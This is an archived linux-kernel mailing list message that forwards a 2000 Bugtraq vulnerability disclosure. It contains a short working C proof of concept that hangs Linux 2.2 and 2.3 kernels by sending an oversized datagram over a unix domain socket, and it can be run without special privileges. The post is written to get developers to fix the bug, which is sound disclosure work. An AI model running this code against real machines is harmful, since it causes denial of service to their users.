[LWN Logo]

From:	"Enri" <mccoy@smc.it>
To:	<linux-kernel@vger.rutgers.edu>
Subject: Fw:      Local Denial-of-Service attack against Linux
Date:	Fri, 24 Mar 2000 15:29:03 +0100


----- Original Message -----
From: Jay Fenlason <fenlason@CLEARWAY.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Thursday, March 23, 2000 11:55 PM
Subject: Local Denial-of-Service attack against Linux


> This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1),
> 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel)
> on my 6x86 scratch machine and our various Pentium development machines.
> Note that this does not require any special privileges.
>
> The send system call immediately puts the kernel in a loop spewing
> kmalloc: Size (131076) too large
> forever (or until you hit the reset button).
>
> Apparently unix domain sockets are ignoring the
/proc/sys/net/core/wmem_max
> parameter, despite the documentation to the contrary.  The fix should be
> simple, but I haven't had time to chase it down, and I'm not (usually) a
> Linux kernel developer.
>
> -- JF
>
> --- BEGIN INCLUDED SOURCE FILE ---
>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <string.h>
>
> char buf[128 * 1024];
>
> int main ( int argc, char **argv )
> {
>     struct sockaddr SyslogAddr;
>     int LogFile;
>     int bufsize = sizeof(buf)-5;
>     int i;
>
>     for ( i = 0; i < bufsize; i++ )
>         buf[i] = ' '+(i%95);
>     buf[i] = '\0';
>
>     SyslogAddr.sa_family = AF_UNIX;
>     strncpy ( SyslogAddr.sa_data, "/dev/log",
sizeof(SyslogAddr.sa_data) );
>     LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
>     sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
>     return 0;
> }
> --- END INCLUDED SOURCE FILE ---
>


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/